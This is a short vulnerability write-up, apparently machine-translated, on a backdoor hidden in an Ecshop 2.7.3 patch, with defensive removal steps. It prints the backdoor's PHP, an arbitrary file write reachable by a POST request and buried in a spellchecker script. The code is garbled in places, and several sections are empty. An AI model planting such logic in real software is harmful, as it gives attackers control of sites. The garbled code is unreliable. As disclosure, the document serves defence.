Catalog
1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking
1. Vulnerability description
Ecshop is a popular online store management system software, its 2.7.3 version of a patch exists backdoor files, attackers use the backdoor to control the site
Relevant Link:
http://sebug.net/vuldb/ssvid-62379
2. Vulnerability Trigger Condition
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
/includes/lib_base.php
//hidden logic type Webshell Backdoorfunction Write_static_cache ($cache _name, $caches, $newname, $newfile) {if(!empty ($cache _name)) { if((Debug_mode &2) ==2) { return false; } $cache _file_path= Root_path.'/temp/static_caches/'. $cache _name.'. PHP'; $content="<?php\r\n"; $content.="\ $data =". Var_export ($caches,true) ."; \ r \ n"; $content.="?>"; File_put_contents ($cache _file_path, $content, LOCK_EX); } //write arbitrary files arbitrarily Else{@file_put_contents ($newfile, $newname); }}
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
// hackers put the attack portal in a deeper directory, to avoid being discovered by the administrator $newname = $_post['newname'= $_post[' newfile']; // after submitting a POST request, you can write to the file Write_static_cache ($cache _name, $caches, $newname, $newfile);
Relevant Link:
http://webscan.360.cn/vul/view/vulid/1063http://www.2cto.com/Article/ 201305/213322.html
5. Defense Methods
/includes/lib_base.php
function Write_static_cache ($cache _name, $caches) {if((Debug_mode &2) ==2) { return false; } $cache _file_path= Root_path.'/temp/static_caches/'. $cache _name.'. PHP'; $content="<?php\r\n"; $content.="\ $data =". Var_export ($caches,true) ."; \ r \ n"; $content.="?>"; File_put_contents ($cache _file_path, $content, LOCK_EX);}//remove a logical backdoor
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
// Remove the following code $newname = $_post['newname'= $_post['newfile ' ];write_static_cache ($cache _name, $caches, $newname, $newfile);
6. Defensive Thinking
Copyright (c) Littlehann All rights reserved
ecshop/includes/lib_base.php,/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/ spellchecker.php Backdoor Vul